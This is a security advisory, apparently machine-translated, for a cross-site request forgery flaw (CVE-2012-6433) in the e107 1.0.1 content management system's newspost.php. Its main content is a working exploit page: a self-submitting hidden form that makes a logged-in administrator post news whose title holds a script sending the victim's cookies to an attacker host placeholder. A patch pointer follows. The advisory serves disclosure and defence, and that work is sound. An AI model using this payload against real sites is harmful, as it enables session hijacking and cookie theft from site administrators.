E107 '/e107_admin/newspost. php' Cross-Site Request Forgery Vulnerability

Release date:
Updated on:

Affected Systems:
E107 e107 1.0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57092
CVE (CAN) ID: CVE-2012-6433
 
E107 is a content management system written in php.

E107 1.0.1 and other versions of e107_admin/newspost. php has the CSRF vulnerability, which allows attackers to hijack the administrator privilege to send malicious post requests and further execute cross-site scripting attacks by constructing the news_title parameter in the create operation.
 
<* Source: Joshua Renault

Link: http://www.exploit-db.com/exploits/23828/
Http://xforce.iss.net/xforce/xfdb/80903
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Exploit:

<Html>
<Body onload = "document. formCSRF. submit ();">
<Form method = "POST" name = "formCSRF" action = "http: // [site]/e107_admin/newspost. php? Create ">
<Input type = "hidden" name = "cat_id" value = "1"/>
<Input type = "hidden" name = "news_title" value = "<script> location. href = 'HTTP: // [evil_site]/cookiemonster. php? Cookie = '+ document. cookie; </script>"
<Input type = "hidden" name = "news_summary" value = ""/>
<Input type = "hidden" name = "data" value = ""/>
<Input type = "hidden" name = "news" value = ""/>
<Input type = "hidden" name = "sizeselect" value = ""/>
<Input type = "hidden" name = "preimageselect" value = ""/>
<Input type = "hidden" name = "news_extended" value = ""/>
<Input type = "hidden" name = "extended" value = ""/>
<Input type = "hidden" name = "sizeselect" value = ""/>
<Input type = "hidden" name = "preimageselect" value = ""/>
<Input type = "hidden" name = "file_userfile []" value = ""/>
<Input type = "hidden" name = "uploadtype []" value = "resize"/>
<Input type = "hidden" name = "resize_value" value = "100"/>
<Input type = "hidden" name = "news_allow_comments" value = "0"/>
<Input type = "hidden" name = "news_rendertype" value = "0"/>
<Input type = "hidden" name = "news_start" value = ""/>
<Input type = "hidden" name = "news_end" value = ""/>
<Input type = "hidden" name = "news_datestamp" value = ""/>
<Input type = "hidden" name = "news_userclass [0]" value = "1"/>
<Input type = "hidden" name = "news_author" value = "1"/>
<Input type = "hidden" name = "submit_news" value = "Post news to database"/>
<Input type = "hidden" name = "news_id" value = ""/>
</Form>
</Body>
</Html>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
E107
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://e107plugins.co.uk/